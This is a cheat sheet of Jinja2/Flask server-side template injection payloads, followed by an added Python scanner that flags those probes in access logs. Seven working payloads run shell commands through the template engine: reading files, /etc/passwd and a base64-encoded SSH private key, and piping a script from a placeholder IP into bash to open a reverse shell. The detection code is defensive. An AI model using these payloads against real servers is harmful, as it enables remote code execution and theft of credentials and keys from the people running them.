Cheat sheet: Jinja2 (Python / Flask) SSTI vulnerability payloads
1. {{2*2}} or {{7*7}}
[+] Desc : Test for the vulnerability (confirms that the injection point evaluates template expressions)
2. {{request.application.__globals__.__builtins__.__import__('os').popen('cat [your path destination]').read()}}
[+] Desc : Read the file at the path you supply
3. {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
[+] Desc : Run id, which prints the user and group names and numeric IDs (UID / GID) of the current user or of any other user
4. {{request.application.__globals__.__builtins__.__import__("os").popen('cat /etc/passwd').read()}}
[+] Desc : Read /etc/passwd, a text file that describes the user login accounts on the system. It should have read permission, system information and any
5. {{request.application.__globals__.__builtins__.__import__("os").popen('cat ~/.ssh/id_rsa | base64').read()}}
[+] Desc : Read ~/.ssh/id_rsa and base64-encode it
6. {{request.application.__globals__.__builtins__.__import__('os').popen('ls -a').read()}}
[+] Desc : List the directory, including hidden files and directories
7. {{request.application.__globals__.__builtins__.__import__('os').popen('curl IP/revshell | bash').read()}}
[+] Desc : Reverse shell via Jinja. Set your IP and port, then listen with netcat
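Added example (not part of the original cheat sheet): a stdlib-only Python scanner that flags the probes listed above in web-server access logs. It percent-decodes the request path and ranks each hit by how far along the chain it reaches (arithmetic probe, __globals__/__builtins__ walk, __import__/popen); the log lines, log format and severity labels are constructed for this example.

```python
import re
from urllib.parse import unquote

# Indicator patterns taken from the payloads in this cheat sheet, grouped by
# severity. Constructed for this example; extend them for your own application.
SIGNATURES = [
    ("critical", re.compile(r"__import__|popen")),         # command execution stage
    ("high", re.compile(r"__globals__|__builtins__")),     # walk from request object to builtins
    ("low", re.compile(r"\{\{\s*\d+\s*\*\s*\d+\s*\}\}")),  # {{7*7}} style arithmetic probe
]
RANK = {"none": 0, "low": 1, "high": 2, "critical": 3}

# Combined log format: client IP, then the request line in double quotes.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')

def normalize(text):
    """Percent-decode twice (catches double-encoded probes) and lowercase."""
    for _ in range(2):
        text = unquote(text)
    return text.lower()

def classify(raw):
    """Return the highest severity matched in one request string, or 'none'."""
    text = normalize(raw)
    if "{{" not in text:
        return "none"      # no Jinja expression delimiters at all
    best = "low"           # any template syntax from a client is worth a look
    for sev, rx in SIGNATURES:
        if rx.search(text) and RANK[sev] > RANK[best]:
            best = sev
    return best

def scan_log(lines):
    """Return (client_ip, method, path, severity) for requests that look like SSTI probes."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue       # malformed line; skip rather than crash the scan
        ip, method, path = m.groups()
        sev = classify(path)
        if sev != "none":
            hits.append((ip, method, path, sev))
    return hits

# Constructed sample access-log lines; the payloads mirror entries 1 and 3 above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /greet?name=alice HTTP/1.1" 200 120',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /greet?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 12',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /greet?name=%7B%7Brequest.application.__globals__.__builtins__.__import__(%27os%27).popen(%27id%27).read()%7D%7D HTTP/1.1" 200 60',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Access logs only carry the URL, so for POST bodies apply classify() to the body at the application or WAF layer; the real fix is never to build a template string from user input (pass it as a template variable instead).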
References:
- https://portswigger.net/web-security/server-side-template-injection
- https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection
- Hack The Box